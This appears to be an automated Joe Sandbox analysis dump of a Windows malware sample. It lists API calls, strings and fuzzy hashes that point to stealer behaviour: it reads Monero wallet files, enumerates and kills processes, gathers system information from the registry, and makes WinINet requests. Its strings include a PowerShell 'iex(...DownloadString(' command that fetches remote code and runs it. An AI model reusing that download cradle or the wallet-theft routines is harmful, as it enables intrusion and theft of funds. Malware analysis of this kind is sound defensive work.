                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                    • wsprintfA.USER32 ref: 00689E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00689F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00689F17
                                    • lstrcat.KERNEL32(00000000,006A12D8), ref: 00689F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00689F7C
                                    • Sleep.KERNEL32(00001388), ref: 0068A013
                                      • Part of subcall function 006999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006999C5
                                      • Part of subcall function 006999A0: Process32First.KERNEL32(0068A056,00000128), ref: 006999D9
                                      • Part of subcall function 006999A0: Process32Next.KERNEL32(0068A056,00000128), ref: 006999F2
                                      • Part of subcall function 006999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00699A4E
                                      • Part of subcall function 006999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00699A6C
                                      • Part of subcall function 006999A0: CloseHandle.KERNEL32(00000000), ref: 00699A79
                                      • Part of subcall function 006999A0: CloseHandle.KERNEL32(0068A056), ref: 00699A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 5bdff0ab52ba78eabf6c5e4834d6229c0174c7b67333bb5ace9ee16c3657ff79
                                    • Instruction ID: 359bcfbc2de35a25dcd52b9d353f71094212a20c0e7d6c2f103d2e89277d861a
                                    • Opcode Fuzzy Hash: 5bdff0ab52ba78eabf6c5e4834d6229c0174c7b67333bb5ace9ee16c3657ff79
                                    • Instruction Fuzzy Hash: 985175B1944308ABDB24EBA0DC4AFDA777DAF44700F00459CB60DAB281DB75AB84CF55
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006FFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006FFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: 32a2726579734579a4f39a1e535b8bebca75f85b7009193b81bc660cdf00bfec
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: BE41A63590011DDBCF10DF68C884AEE7BF6FF45324F148165EA18AB392D7759905CB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00685021
                                    • InternetOpenA.WININET(006A0DE3,00000000,00000000,00000000,00000000), ref: 0068503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685091
                                    • InternetCloseHandle.WININET(?), ref: 00685109
                                    • InternetCloseHandle.WININET(?), ref: 00685116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 2fec212a59976635b5846b81c195659d88218ef0cbe9e0f223a0effa24266703
                                    • Instruction ID: c49ce29e08775137eb7c4698b42892a385aa4634be0225f35f897d8a9fc27d31
                                    • Opcode Fuzzy Hash: 2fec212a59976635b5846b81c195659d88218ef0cbe9e0f223a0effa24266703
                                    • Instruction Fuzzy Hash: 1B310AB4A44218ABDB20DF94DC85BDCB7B5AB48305F5081D8F609A7281CB706FC59F98
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006985B6
                                    • wsprintfA.USER32 ref: 006985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0069861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698629
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,0142D9E0,00000000,000F003F,?,00000400), ref: 0069867C
                                    • lstrlen.KERNEL32(?), ref: 00698691
                                    • RegQueryValueExA.ADVAPI32(00000000,0142D920,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B3C), ref: 00698729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 006987AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ff73109fee0c83d3be17c6492db10173a9a4f050ab771dbf659755a6983c72ff
                                    • Instruction ID: d943a0e8c4def2b01f2dcdfa2ad31165f378fc4d30879e35d5f87f1db643381a
                                    • Opcode Fuzzy Hash: ff73109fee0c83d3be17c6492db10173a9a4f050ab771dbf659755a6983c72ff
                                    • Instruction Fuzzy Hash: D0211971A1421CAFDB24DB94DC85FE9B3B9FB48701F1081D8E609A6180DF71AA85CFE4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006999C5
                                    • Process32First.KERNEL32(0068A056,00000128), ref: 006999D9
                                    • Process32Next.KERNEL32(0068A056,00000128), ref: 006999F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00699A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00699A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00699A79
                                    • CloseHandle.KERNEL32(0068A056), ref: 00699A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: dea0c91be69cc9834c4bf64cfb0d00500174e7eb966b14478d53734389145095
                                    • Instruction ID: 37692b2f74b8c216cc022e55914741fe68d655bcfd212bf2f706c4b5b942e80d
                                    • Opcode Fuzzy Hash: dea0c91be69cc9834c4bf64cfb0d00500174e7eb966b14478d53734389145095
                                    • Instruction Fuzzy Hash: 2921EA71918218ABDF25DFA6DC89BEDB7B9FB48301F1041C8E509A6290D7749F84DF60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0069783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141BA48,00000000,00020119,00000000), ref: 0069786D
                                    • RegQueryValueExA.ADVAPI32(00000000,0142DA40,00000000,00000000,?,000000FF), ref: 0069788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00697898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: edf595e265050375c02601a632d060299002ddd3cfbaf69c7944dcefd6ff8d17
                                    • Instruction ID: 1ccd9af29bfe349be7d16c496f2f29c27fdc64fcdbbc94cbac69368bad9da099
                                    • Opcode Fuzzy Hash: edf595e265050375c02601a632d060299002ddd3cfbaf69c7944dcefd6ff8d17
                                    • Instruction Fuzzy Hash: 9C01F475A5C305BBEB00DBE5ED49F6EB77DEB44701F104198F61597290D6709A00DB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006978C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006978CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141BA48,00000000,00020119,00697849), ref: 006978EB
                                    • RegQueryValueExA.ADVAPI32(00697849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069790A
                                    • RegCloseKey.ADVAPI32(00697849), ref: 00697914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: d0570f730ff592bf5a417b8b22e1a8e411c806ae6e9aa22b0987bbb6c9c5ffca
                                    • Instruction ID: a453b65ee0f6bb7778118a8708cb51b5b80d6e2a1eda7da63cf204f2d813165d
                                    • Opcode Fuzzy Hash: d0570f730ff592bf5a417b8b22e1a8e411c806ae6e9aa22b0987bbb6c9c5ffca
                                    • Instruction Fuzzy Hash: 1401F4B5A58309BFEB00DBE5EC49FAEB77CEB44701F104595F615A7281DB705A00DB90
                                    APIs
                                    • CreateFileA.KERNEL32(>=i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693D3E,?), ref: 0069948C
                                    • GetFileSizeEx.KERNEL32(000000FF,>=i), ref: 006994A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 006994B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: >=i$>=i
                                    • API String ID: 1378416451-383082895
                                    • Opcode ID: caf22b8c4691937f37506f88f4838088f42b01e037e0f8f62479076fe908898e
                                    • Instruction ID: d958f22f6fed5d9b94a8045324f543e10412161b4fd395a8e9758ddb63bafcb8
                                    • Opcode Fuzzy Hash: caf22b8c4691937f37506f88f4838088f42b01e037e0f8f62479076fe908898e
                                    • Instruction Fuzzy Hash: 56F03135E18308BBDF10DBF5EC49F9EB7BAAB48711F108558FA11A7280D670A6019F60
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                    • LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: e9da395a8ebf4ab8479a48e599bd3eaeb7349b40c3fafcbe1d1e3fa90f053ac9
                                    • Instruction ID: 72866be42a076ede7e368cfc04a2b34cf95b43e8cbf9e96ab1654f4abac68370
                                    • Opcode Fuzzy Hash: e9da395a8ebf4ab8479a48e599bd3eaeb7349b40c3fafcbe1d1e3fa90f053ac9
                                    • Instruction Fuzzy Hash: 28312F74A04209EFDB14DFE5D849BEEB7B6BF48301F108159E911A7390D774AA81CFA1
                                    APIs
                                    • lstrcat.KERNEL32(?,0142DD70), ref: 00694A2B
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00694A51
                                    • lstrcat.KERNEL32(?,?), ref: 00694A70
                                    • lstrcat.KERNEL32(?,?), ref: 00694A84
                                    • lstrcat.KERNEL32(?,0141B310), ref: 00694A97
                                    • lstrcat.KERNEL32(?,?), ref: 00694AAB
                                    • lstrcat.KERNEL32(?,0142D0B8), ref: 00694ABF
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F20: GetFileAttributesA.KERNEL32(00000000,?,00681B94,?,?,006A577C,?,?,006A0E22), ref: 00698F2F
                                      • Part of subcall function 006947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006947D0
                                      • Part of subcall function 006947C0: RtlAllocateHeap.NTDLL(00000000), ref: 006947D7
                                      • Part of subcall function 006947C0: wsprintfA.USER32 ref: 006947F6
                                      • Part of subcall function 006947C0: FindFirstFileA.KERNEL32(?,?), ref: 0069480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 6f9d5a08442fdc77ae8b9e21096c50d4ee65324e1f09659586a763e64d637761
                                    • Instruction ID: 55f5a6c477b9a15892c480b8db485a5202918d94adfd50ed1a84ca773c8eeedb
                                    • Opcode Fuzzy Hash: 6f9d5a08442fdc77ae8b9e21096c50d4ee65324e1f09659586a763e64d637761
                                    • Instruction Fuzzy Hash: 86319CF2900208ABCF54FBB0DC86EED733DAB58300F44468DB21596495EE74A7C9CB98
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00692FD5
                                    Strings
                                    • <, xrefs: 00692F89
                                    • ')", xrefs: 00692F03
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692F54
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692F14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 2c39b07a522f667bc6db2257759d936badd44ac45e3b99f75fe7728785c94ea2
                                    • Instruction ID: 72b14635f5a216d263a3cd14b4785f926e92fbd7e9671e647be41c1f51df3226
                                    • Opcode Fuzzy Hash: 2c39b07a522f667bc6db2257759d936badd44ac45e3b99f75fe7728785c94ea2
                                    • Instruction Fuzzy Hash: 5A41FC719102089ADF54FBE0C8A2BEDB7BEAF14300F40455DE006AB596DF702A4ACFD9
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0142D118,00000000,00020119,?), ref: 00694344
                                    • RegQueryValueExA.ADVAPI32(?,0142DC68,00000000,00000000,00000000,000000FF), ref: 00694368
                                    • RegCloseKey.ADVAPI32(?), ref: 00694372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00694397
                                    • lstrcat.KERNEL32(?,0142DCB0), ref: 006943AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 9fc0827a8ef54c458c5fb745d626a7ba34f472919708ccd24975c7c115d64759
                                    • Instruction ID: 469b81a2e9e81bd744a0d1f104f65eddff3981658a76e17c704d09ce8cf95abb
                                    • Opcode Fuzzy Hash: 9fc0827a8ef54c458c5fb745d626a7ba34f472919708ccd24975c7c115d64759
                                    • Instruction Fuzzy Hash: B941B7B69102086BDF14FBA0EC56FEE733DAB88300F40455CB7155B581EE7557888BD1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 0b416db52ce28384b7257233a903152d2ff28a545c018d895b7650d4a28dbc68
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 17218C72D4062DABDB619F59CE41EBF3A7BEB81BB0F054119FA19A7351C3308D418BA0
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00696C0C
                                    • sscanf.NTDLL ref: 00696C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00696C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00696C60
                                    • ExitProcess.KERNEL32 ref: 00696C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 26fbcd5040f456fad6ad1b85411e0edf7bdd10786f44eba499bcb548dd4c6943
                                    • Instruction ID: 58fba1d3cc558558da91f25d69f2992f9635490c4e6d29fb8506b0f0ae27d609
                                    • Opcode Fuzzy Hash: 26fbcd5040f456fad6ad1b85411e0edf7bdd10786f44eba499bcb548dd4c6943
                                    • Instruction Fuzzy Hash: B121CD75D142089BCF44DFE4E8459EEB7BABF48301F04856DF516A3650EB349608CB69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141B888,00000000,00020119,?), ref: 00697FEE
                                    • RegQueryValueExA.ADVAPI32(?,0142D098,00000000,00000000,000000FF,000000FF), ref: 0069800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00698022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: c15fd3e527974fb183ddb169545e842ab095d7c99bc49ee63d50b434673c93cc
                                    • Instruction ID: 8b6a3de140399f0496b6d233ae84eeeafc7a4bcf46beb12f4effdf9ebc0fd012
                                    • Opcode Fuzzy Hash: c15fd3e527974fb183ddb169545e842ab095d7c99bc49ee63d50b434673c93cc
                                    • Instruction Fuzzy Hash: 75118CB1A48305AFEB00CFD5ED46FAFBBBCEB44B11F104219F615A7680DB7559009BA1
                                    APIs
                                    • StrStrA.SHLWAPI(0142DCE0,00000000,00000000,?,00689F71,00000000,0142DCE0,00000000), ref: 006993FC
                                    • lstrcpyn.KERNEL32(00957580,0142DCE0,0142DCE0,?,00689F71,00000000,0142DCE0), ref: 00699420
                                    • lstrlen.KERNEL32(00000000,?,00689F71,00000000,0142DCE0), ref: 00699437
                                    • wsprintfA.USER32 ref: 00699457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 7e3fbdcb1bb698e36182dcf2129cf3bf5c94c50d93372278e4f1315511f36ec5
                                    • Instruction ID: b1fe6024a7523399070262688a0e948c0fffa8d0119f7a710cd43f626982bc07
                                    • Opcode Fuzzy Hash: 7e3fbdcb1bb698e36182dcf2129cf3bf5c94c50d93372278e4f1315511f36ec5
                                    • Instruction Fuzzy Hash: 81011E75508208FFCB04DFE9D948EAEBBB9EB48705F108248F9098B240D631AB45DB90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 006812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: e48ee1c2415e22b642129a6faf22e6d0d235d1661d18552b342205dcc7a8b3da
                                    • Instruction ID: 5f96fd8f286ed306ab2b0cc307b15a91a953ee68fcb22572d1ff6e37a2a687a7
                                    • Opcode Fuzzy Hash: e48ee1c2415e22b642129a6faf22e6d0d235d1661d18552b342205dcc7a8b3da
                                    • Instruction Fuzzy Hash: 8E011D79A58309BFDB00DFE1EC49FAEB77CAB48701F004194FA1597280DA709B009B90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 808df0ab09aefaa921b89f5589ff04b2565168eefd93f98b8283ab99567a843a
                                    • Instruction ID: aae14d741fcf3948810b25facb857507d85380f837a091b51ee73c57127e0056
                                    • Opcode Fuzzy Hash: 808df0ab09aefaa921b89f5589ff04b2565168eefd93f98b8283ab99567a843a
                                    • Instruction Fuzzy Hash: 244125B010078C9EDF318B248D85FFB7FEE9B45314F1444ECE98A97582D2319A459F60
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696903
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 006969C6
                                    • ExitProcess.KERNEL32 ref: 006969F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
